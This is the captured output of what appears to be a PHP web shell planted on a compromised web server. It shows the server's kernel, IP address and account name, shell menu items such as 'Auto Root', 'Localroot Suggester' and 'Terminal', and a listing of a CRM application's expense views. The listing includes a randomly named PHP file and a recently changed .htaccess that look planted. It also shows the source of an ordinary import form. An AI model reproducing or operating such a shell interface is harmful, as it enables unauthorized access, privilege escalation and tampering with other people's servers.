Linux srv.fwservers.com 4.18.0-477.21.1.el8_8.x86_64 #1 SMP Thu Aug 10 13:51:50 EDT 2023 x86_64
Apache
Server IP : 199.127.63.82 & Your IP : 216.73.217.89
Domains : 56 Domain
User : aconstruction
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
aconstruction /
public_html /
app /
application /
views /
admin /
expenses /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
518
B
-r-xr-xr-x
2026-09-03 03:31
_bulk_actions_modal.php
3.75
KB
-rw-rw-r--
2023-07-26 19:02
expense.php
35.42
KB
-rw-rw-r--
2023-07-26 19:02
expense_category.php
3.64
KB
-rw-rw-r--
2023-07-26 19:02
expense_pdf.php
2.65
KB
-rw-rw-r--
2023-07-26 19:02
expense_preview_template.php
22.6
KB
-rw-rw-r--
2023-07-26 19:02
expenses_total_template.php
3.13
KB
-rw-rw-r--
2023-07-26 19:02
filter_by_template.php
5.67
KB
-rw-rw-r--
2023-07-26 19:02
import.php
2.76
KB
-rw-rw-r--
2023-07-26 19:02
index.html
131
B
-rw-rw-r--
2023-07-26 19:02
manage.php
7.24
KB
-rw-rw-r--
2023-07-26 19:02
manage_categories.php
1.12
KB
-rw-rw-r--
2023-07-26 19:02
qlVOIMLbk.php
34.65
KB
-rw-r--r--
2026-06-24 02:58
table_html.php
1.93
KB
-rw-rw-r--
2023-07-26 19:02
Save
Rename
<?php defined('BASEPATH') or exit('No direct script access allowed'); ?> <?php init_head(); ?> <div id="wrapper"> <div class="content"> <div class="row"> <div class="col-md-12"> <?php if (!$this->import->isSimulation()) { ?> <div class="alert alert-info"> <?php echo $this->import->importGuidelinesInfoHtml(); ?> </div> <?php } ?> <h4 class="tw-font-semibold tw-text-lg tw-text-neutral-700 tw-flex tw-justify-between tw-items-center"> <?php echo _l('import_expenses'); ?> <?php echo $this->import->downloadSampleFormHtml(); ?> </h4> <div class="panel_s"> <div class="panel-body"> <?php echo $this->import->maxInputVarsWarningHtml(); ?> <?php if (!$this->import->isSimulation()) { ?> <?php echo $this->import->createSampleTableHtml(); ?> <?php } else { ?> <div class="tw-mb-6"> <?php echo $this->import->simulationDataInfo(); ?> </div> <?php echo $this->import->createSampleTableHtml(true); ?> <?php } ?> <div class="row"> <div class="col-md-4"> <?php echo form_open_multipart($this->uri->uri_string(), ['id' => 'import_form']) ; ?> <?php echo form_hidden('items_import', 'true'); ?> <?php echo render_input('file_csv', 'choose_csv_file', '', 'file'); ?> <div class="form-group"> <button type="button" class="btn btn-primary import btn-import-submit"><?php echo _l('import'); ?></button> <button type="button" class="btn btn-primary simulate btn-import-submit"><?php echo _l('simulate_import'); ?></button> </div> <?php echo form_close(); ?> </div> </div> </div> </div> </div> </div> </div> </div> <?php init_tail(); ?> <script src="<?php echo base_url('assets/plugins/jquery-validation/additional-methods.min.js'); ?>"></script> <script> $(function() { appValidateForm($('#import_form'), { file_csv: { required: true, extension: "csv" } }); }); </script> </body> </html>